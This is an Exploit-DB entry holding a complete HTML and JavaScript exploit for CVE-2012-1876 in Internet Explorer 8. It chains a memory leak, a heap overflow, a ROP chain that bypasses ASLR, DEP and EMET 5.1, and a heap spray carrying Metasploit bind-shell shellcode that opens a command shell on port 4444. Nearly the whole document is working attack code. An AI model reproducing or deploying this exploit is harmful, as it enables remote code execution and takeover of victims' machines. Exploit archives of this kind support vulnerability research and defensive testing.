Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)

EDB-ID:

35273


Platform:

Windows

Published:

2014-11-17

<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
-->

<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>

function strtoint(str) {
        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();

var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

for (var i=0; i < 500; i+=2) {
        fr[i] = free.substring(0, (0x100-6)/2);
        al[i] = string1.substring(0, (0x100-6)/2);
        bl[i] = string2.substring(0, (0x100-6)/2);
        var obj = document.createElement("button");
        div_container.appendChild(obj);
}

for (var i=200; i<500; i+=2 ) {
        fr[i] = null;
        CollectGarbage();
}

function heapspray(cbuttonlayout) {
    CollectGarbage();
    var rop = cbuttonlayout + 4161; // RET
    var rop = rop.toString(16);
    var rop1 = rop.substring(4,8);
    var rop2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 11360; // POP EBP
    var rop = rop.toString(16);
    var rop3 = rop.substring(4,8);
    var rop4 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
    var rop = rop.toString(16);
    var rop5 = rop.substring(4,8);
    var rop6 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12377; // POP EBX
    var rop = rop.toString(16);
    var rop7 = rop.substring(4,8);
    var rop8 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 642768; // POP EDX
    var rop = rop.toString(16);
    var rop9 = rop.substring(4,8);
    var rop10 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 5504544; // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12462; // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 12043; // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 63776; // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 85751; // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 4936; // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 234657; // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4); // } RET


    var rop = cbuttonlayout + 408958; // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 2228408; // POP ECX
    var rop = rop.toString(16);
    var rop25 = rop.substring(4,8);
    var rop26 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 1586172; // POP EAX
    var rop = rop.toString(16);
    var rop27 = rop.substring(4,8);
    var rop28 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
    var rop = rop.toString(16);
    var rop29 = rop.substring(4,8);
    var rop30 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 1884912; // PUSH EAX
    var rop = rop.toString(16);
    var rop31 = rop.substring(4,8);
    var rop32 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
    var rop = rop.toString(16);
    var rop33 = rop.substring(4,8);
    var rop34 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
    var rop = rop.toString(16);
    var rop35 = rop.substring(4,8);
    var rop36 = rop.substring(0,4); // } RET

    var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
    var rop = rop.toString(16);
    var rop37 = rop.substring(4,8);
    var rop38 = rop.substring(0,4); // } RET

    var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
    var getmodulew = getmodulew.toString(16);
    var getmodulew1 = getmodulew.substring(4,8);
    var getmodulew2 = getmodulew.substring(0,4); // } RET

    var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
    var rop = rop.toString(16);
    var rop41 = rop.substring(4,8);
    var rop42 = rop.substring(0,4); // } RET

    var shellcode = unescape("%u4444");
    while (shellcode.length < 100)
        shellcode = shellcode + shellcode;
        var shellcode = shellcode.substr(0, 46);

    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN

    // EMET disable part 0x01 annihilate ROP protections
    // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
    shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2);    // GetModuleHandleW Ptr
    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u5f3c%u07d2");           // EMET_STRING_PTR (GetModuleHandle argument) 
    shellcode+= unescape("%u7372%u0006");           // Offset to "decoding helper" 0x67372
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP # RETN 
    shellcode+= unescape("%u5e84%u07d2");           // Set EBP to successfully return from the "decoding helper" 
    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN  Call the "decoding helper"
    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue 
    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
    shellcode+= unescape("%u"+rop41+"%u"+rop42);    // MOV EAX,EDX # RETN
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI # RETN
    shellcode+= unescape("%u5f38%u07d2");           // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) 
    shellcode+= unescape("%u"+rop37+"%u"+rop38);    // MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u01b8%u0000");           // offset to NtProtectVirtualMemory unhooked
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
    shellcode+= unescape("%uffff%uffff");           // ProcessHandle
    shellcode+= unescape("%u5f38%u07d2");           // *BaseAddress
    shellcode+= unescape("%u5f34%u07d2");           // NumberOfBytesToProtect
    shellcode+= unescape("%u0040%u0000");           // NewAccessProtection
    shellcode+= unescape("%u5f30%u07d2");           // OldAccessProtection
    shellcode+= unescape("%u5f38%u07d2");           // Reget pointer
    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u0558%u0000");           // Offset to EMET mitigations switch
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u0000%u0000");           // NULL
    shellcode+= unescape("%u"+rop35+"%u"+rop36);    // MOV DWORD PTR [EAX],ECX # RETN

    // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8);      // POP EBX
    shellcode+= unescape("%u1024%u0000");           // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10);     // POP EDX
    shellcode+= unescape("%u0040%u0000");           // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12);    // POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2);  // Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14);    // POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2);      // RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18);    // POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2);        // VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22);    // PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24);    // PUSH ESP

    // Store various pointers here
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u18eb");           // NOPs
    shellcode+= unescape("%u4242%u4242");           // OldAccessProtection
    shellcode+= unescape("%u0564%u0000");           // Size for NtVirtualProtectMemory
    shellcode+= unescape("%u4141%u4141");           // Store BaseAddress address on the *stack*
    shellcode+= "EMET";                             // EMET string
    shellcode+= unescape("%u0000%u0000");           // EMET string
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u9090");           // NOPs
    // Store various pointers here

    // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread 
    // MOV     EAX,DWORD PTR DS:[076D10BCH]
    // MOV     EAX,DWORD PTR DS:[007D25F48H]
    // MOV     ESI,DWORD PTR [EAX+518H]
    // SUB     ESP,2CCH
    // MOV     DWORD PTR [ESP],10010H
    // MOV     EDI,ESP
    // MOV     ECX,2CCH
    // ADD     EDI,4
    // SUB     ECX,4
    // XOR     EAX,EAX
    // REP STOS BYTE PTR ES:[EDI]
    // PUSH    ESP
    // PUSH    0FFFFFFFEH
    // CALL    ESI
    shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" +
                         "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
                         "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
                         "%ufe6a%ud6ff");
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u9090");           // NOPs
    // EMET disable part 0x02 end

    // Bind shellcode on 4444 :)
    // msf > generate -t js_le
    // windows/shell_bind_tcp - 342 bytes
    // http://www.metasploit.com
    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    // I would keep the shellcode the same size for better reliability :)

    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                             "%u006a%uff53%u41d5");

    // Total spray should be 1000
    var padding = unescape("%u9090");
    while (padding.length < 1000)
        padding = padding + padding;
    var padding = padding.substr(0, 1000 - shellcode.length);

    shellcode+= padding;

    while (shellcode.length < 100000)
        shellcode = shellcode + shellcode;

    var onemeg = shellcode.substr(0, 64*1024/2);

    for (i=0; i<14; i++) {
        onemeg += shellcode.substr(0, 64*1024/2);
    }

    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

    var spray = new Array();

    for (i=0; i<100; i++) {
        spray[i] = onemeg.substr(0, onemeg.length);
    }
}

function leak(){
        var leak_col = document.getElementById("132");
        leak_col.width = "41";
        leak_col.span = "19";
}

function get_leak() {
        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
        str_addr = str_addr - 1410704;
        var hex = str_addr.toString(16);
        //alert(hex);
        setTimeout(function(){heapspray(str_addr)}, 50);
}

function trigger_overflow(){
        var evil_col = document.getElementById("132");
        evil_col.width = "1312272"; // 0x07D25E40
        evil_col.span = "44";
}

setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);

</script>
</body>
</html>